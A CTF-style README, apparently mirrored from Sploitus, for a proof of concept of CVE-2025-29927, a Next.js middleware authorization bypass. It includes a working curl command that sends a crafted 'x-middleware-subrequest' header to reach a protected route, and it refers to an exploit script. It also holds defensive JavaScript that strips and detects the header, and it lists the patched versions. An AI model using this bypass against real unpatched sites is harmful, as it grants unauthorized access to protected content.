## https://sploitus.com/exploit?id=A67DEE91-2863-597C-9938-298ED26DC6A8
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)
This is a **Capture The Flag (CTF)** styled Proof of Concept for the **Next.js Middleware Authorization Bypass** vulnerability (**CVE-2025-29927**). The goal is to bypass the auth middleware and retrieve the flag from the `/protected` route.
---
## Vulnerability Summary
- **CVE**: CVE-2025-29927
- **Type**: Authorization Bypass
- **Component**: Next.js Middleware
- **Impact**: Unauthorized access to protected routes
- **PoC Target Route**: `/protected`
- **Expected Behavior**: Unauthorized users are redirected to `/`
- **Vulnerable Behavior**: A crafted request skips the redirect and reaches the protected content directly
---
## PoC Setup
### 1. Clone the Repository
```bash
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
```
---
### 2. Build and Run the Vulnerable App
```bash
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
```
This starts the vulnerable Next.js app on **http://IP:3000** (replace `IP` with the address of the Docker host).
---
## Exploitation
### 1. Without Exploit
Try accessing:
```bash
curl -i http://IP:3000/protected
```
You will be redirected to `/`.
### 2. With Exploit
Manually, a single crafted `x-middleware-subrequest` header is enough to bypass the middleware:
```bash
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
```
Alternatively, use the provided `exploit.py` to bypass the middleware and access the protected route:
```bash
python3 exploit.py -url http://IP:3000
```
If successful, you will retrieve the flag from `/protected`.
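As an added, defender-side example that is not part of this repository or of Next.js itself: a small Node.js snippet showing the two controls a practitioner wants around this bug. First, a reverse proxy in front of the app should drop the `x-middleware-subrequest` header from external requests before they reach Next.js (the header is only meaningful on the framework's own internal subrequests); second, any externally received request that carries the header at all, whatever its value, is worth flagging in access logs. The request shape (`{client, method, path, headers}`) and the log lines are constructed for the example. The real fix is upgrading to a patched Next.js release (15.2.3, 14.2.25, 13.5.9 or 12.3.5); header stripping is the interim workaround.

```javascript
// Added example, not part of the CVE-2025-29927 PoC repository.
// Defensive handling of the header the PoC relies on.

const BYPASS_HEADER = 'x-middleware-subrequest';

// Mitigation: a reverse proxy must never forward this header from an
// external client. Returns a new header object with every spelling of the
// header removed (HTTP header names are case-insensitive).
function stripBypassHeader(headers) {
  const cleaned = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== BYPASS_HEADER) {
      cleaned[name] = value;
    }
  }
  return cleaned;
}

// Detection: any externally received request carrying the header is an
// attempt to skip middleware, regardless of the header's value.
// Request shape assumed here: { client, method, path, headers } (constructed).
function isBypassAttempt(request) {
  return Object.keys(request.headers || {})
    .some((name) => name.toLowerCase() === BYPASS_HEADER);
}

// Scan JSON-lines access log text and return the suspicious entries with
// the client, the route they targeted and the header value that was sent.
function findBypassAttempts(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    if (!line.trim()) continue;
    const entry = JSON.parse(line);
    if (!isBypassAttempt(entry)) continue;
    const headerName = Object.keys(entry.headers)
      .find((n) => n.toLowerCase() === BYPASS_HEADER);
    hits.push({ client: entry.client, path: entry.path, value: entry.headers[headerName] });
  }
  return hits;
}

// Constructed access log: two normal requests and two bypass attempts
// (the second attempt uses a different header-name casing).
const SAMPLE_LOG = [
  { client: '203.0.113.10', method: 'GET', path: '/protected', headers: { host: 'app.example' } },
  { client: '203.0.113.10', method: 'GET', path: '/', headers: { host: 'app.example' } },
  { client: '198.51.100.7', method: 'GET', path: '/protected',
    headers: { host: 'app.example', 'x-middleware-subrequest': 'middleware' } },
  { client: '198.51.100.7', method: 'GET', path: '/protected',
    headers: { host: 'app.example', 'X-Middleware-Subrequest': 'middleware' } },
].map((e) => JSON.stringify(e)).join('\n');

// Stand-alone demo when run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('bypass attempts:', findBypassAttempts(SAMPLE_LOG));
  console.log('cleaned headers:',
    stripBypassHeader({ Host: 'app.example', 'X-Middleware-Subrequest': 'middleware' }));
}
```

Matching on the header's presence rather than on the value `middleware` is deliberate: the value the framework expects varies between Next.js versions and project layouts, but no legitimate external client ever sets the header, so presence alone is the signal. The same rule applied at the proxy (drop the header) and in the log pipeline (alert on it) covers both mitigation and detection until the upgrade is in place.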
---
## Files
- `Dockerfile` - Builds the vulnerable Next.js application
- `exploit.py` - Exploits the vulnerability to bypass auth
- `pages/` - Contains the vulnerable `/protected` and `/login` routes
- `middleware.js` - The vulnerable middleware logic
- `README.md` - This file
---
## Disclaimer
This PoC is for **educational and research purposes only**. Do not use it against systems you do not own or have explicit permission to test.
---
## Flag
Find the flag by exploiting the vulnerability and accessing:
```
http://IP:3000/protected
```
Good luck!